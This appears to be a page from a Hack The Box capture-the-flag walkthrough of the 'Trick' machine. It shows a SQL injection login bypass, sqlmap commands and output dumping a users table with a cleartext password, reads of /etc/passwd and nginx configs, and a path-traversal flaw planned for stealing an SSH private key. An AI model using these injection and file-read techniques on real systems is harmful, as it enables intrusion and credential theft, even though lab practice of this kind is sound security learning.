80

We get a login page on the subdomain. I tried my luck and got access to the administrator account abusing SQL injection for the username input - admin' OR '1'='1' — -

Its an RMS (Recruitment Management System). We find a user

This looks like a very simple website.

Turns out, its an actual software and not a custom made by HTB. And there is a CVE for this SQLi vulnerability - CVE-2022-28468.

We can also make modifications to the admin account.

It is prefilled and we can read the password. SuperGucciRainbowCake

Going back to the login page again, we know there is an SQLi vulnerability. Can we further use it to read enumerate the database?

First of all, we do get back results based on our queries. If the query returns True, we get 1. Otherwise we get 3. This is a boolean-based blind SQLi. We can use that to read enumerate the database.

I saved the request in a file:

cat login.req
POST /ajax.php?action=login HTTP/1.1
Host: preprod-payroll.trick.htb
Content-Length: 51
X-Requested-With: XMLHttpRequest
Accept-Language: en-GB,en;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://preprod-payroll.trick.htb
Referer: http://preprod-payroll.trick.htb/login.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=iimo88t45l1j0jfbaefs435q4i
Connection: keep-alive

username=admin&password=

Using SQLmap

sqlmap -r login.req --batch --technique B --level 5
        ___
       __H__                                                                                                                                                                                 
 ___ ___["]_____ ___ ___  {1.8.11#stable}                                                                                                                                                    
|_ -| . [.]     | .'| . |                                                                                                                                                                    
|___|_  [.]_|_|_|__,|  _|                                                                                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:39:27 /2025-02-03/

[16:39:27] [INFO] parsing HTTP request from 'login.req'
[16:39:27] [WARNING] provided value for parameter 'password' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[16:39:27] [INFO] testing connection to the target URL
[16:39:27] [INFO] testing if the target URL content is stable
[16:39:27] [INFO] target URL content is stable
[16:39:27] [INFO] testing if POST parameter 'username' is dynamic
[16:39:28] [WARNING] POST parameter 'username' does not appear to be dynamic
[16:39:28] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[16:39:28] [INFO] testing for SQL injection on POST parameter 'username'
[16:39:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:39:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[16:39:58] [INFO] POST parameter 'username' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --not-string="21")
[16:40:03] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided risk (1) value? [Y/n] Y
[16:40:03] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 157 HTTP(s) requests:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: username=admin' AND 9928=(SELECT (CASE WHEN (9928=9928) THEN 9928 ELSE (SELECT 2581 UNION SELECT 1656) END))-- SzQq&password=
---
[16:40:11] [INFO] testing MySQL
[16:40:11] [INFO] confirming MySQL
[16:40:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[16:40:12] [INFO] fetched data logged to text files under '/home/anonmak9/.local/share/sqlmap/output/preprod-payroll.trick.htb'

[*] ending @ 16:40:12 /2025-02-03/

Current User Information

sqlmap -r login.req --batch --threads 10 --current-user --current-db --is-dba

[16:46:21] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL 5 (MariaDB fork)
[16:46:21] [INFO] fetching current user
[16:46:21] [INFO] retrieving the length of query output
[16:46:21] [INFO] resumed: 14
[16:46:21] [INFO] resumed: remo@localhost
current user: 'remo@localhost'
[16:46:21] [INFO] fetching current database
[16:46:21] [INFO] retrieving the length of query output
[16:46:21] [INFO] resumed: 10
[16:46:21] [INFO] resumed: payroll_db
current database: 'payroll_db'
[16:46:21] [INFO] testing if current user is DBA
[16:46:21] [INFO] fetching current user
current user is DBA: False
[16:46:21] [INFO] fetched data logged to text files under '/home/anonmak9/.local/share/sqlmap/output/preprod-payroll.trick.htb'

[*] ending @ 16:46:21 /2025-02-03/

Tables

sqlmap -r login.req --batch --threads 10 -D payroll_db --tables

Database: payroll_db
[11 tables]
+---------------------+
| position            |
| allowamces          |
| attendance          |
| deductions          |
| department          |
| employee            |
| employee_allowances |
| employee_deductions |
| payroll             |
| payroll_items       |
| users               |
+---------------------+

Dumping data

sqlmap -r login.req --batch --threads 10 -D payroll_db -T users --dump

Database: payroll_db
Table: users
[1 entry]
+----+-----------+---------+---------------+---------+---------+-----------------------+------------+
| id | doctor_id | qyie    | name          | address | contact | password              | username   |
+----+-----------+---------+---------------+---------+---------+-----------------------+------------+
| 1  | 0         | <blank> | Administrator | <blank> | <blank> | SuperGucciRainbowCake | Enemigosss |
+----+-----------+---------+---------------+---------+---------+-----------------------+------------+

Reading local files

We can confirm that file read is enabled. Trying to read the /etc/passwd file to find usernames and if they run a shell.

I had to specify --tehcnique= properly otherwise it doesn't work

sqlmap -r login.req --batch --level 5 --threads 10 --technique=BEU --file-read=/etc/passwd --flush-session

cat /home/anonmak9/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
michael:x:1001:1001::/home/michael:/bin/bash

We know that this box is running NGINX so lets try to read the configuration files, specifically the sites_enabled file to see if we can find other vhosts. The location is /etc/nginx/sites-enabled/default.

sqlmap -r login.req --batch --level 5 --threads 10 --technique=BEU --file-read=/etc/nginx/sites-enabled/default --flush-session

cat /home/anonmak9/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_nginx_sites-enabled_default
server {
        listen 80 default_server;
        listen [::]:80 default_server;
        server_name trick.htb;
        root /var/www/html;

        index index.html index.htm index.nginx-debian.html;

        server_name _;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        }
}


server {
        listen 80;
        listen [::]:80;

        server_name preprod-marketing.trick.htb;

        root /var/www/market;
        index index.php;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
        }
}

server {
        listen 80;
        listen [::]:80;

        server_name preprod-payroll.trick.htb;

        root /var/www/payroll;
        index index.php;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        }
}

We find another subdomain preprod-marketing.trick.htb. And the fastcgi_pass here is different. We do see the name Michael so maybe it runs under the user Michael we saw before? I put that into my /etc/hosts.

i visited the site, nothing interesting there. So reading the index.php file like before:

cat /home/anonmak9/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_var_www_market_index.php   
<?php
$file = $_GET['page'];

if(!isset($file) || ($file=="index.php")) {
   include("/var/www/market/home.html");
}
else{
        include("/var/www/market/".str_replace("../","",$file));
}
?>

We see that it id vulnerable to Path Traversal. It takes whatever file name we give it as the path and outputs it but it filters and removes ../ but it still is vulnerable as it only removes it once and it is non-recursive. Meaning, if we input ....// it will remove the ../ but it still leaves another ../.

We know ssh port 22 is open, and we got the username michael, enough to prepare a payload to read the private key and use that to get foothold.

PreviousDNS - 53 NextFoothold

Last updated 10 months ago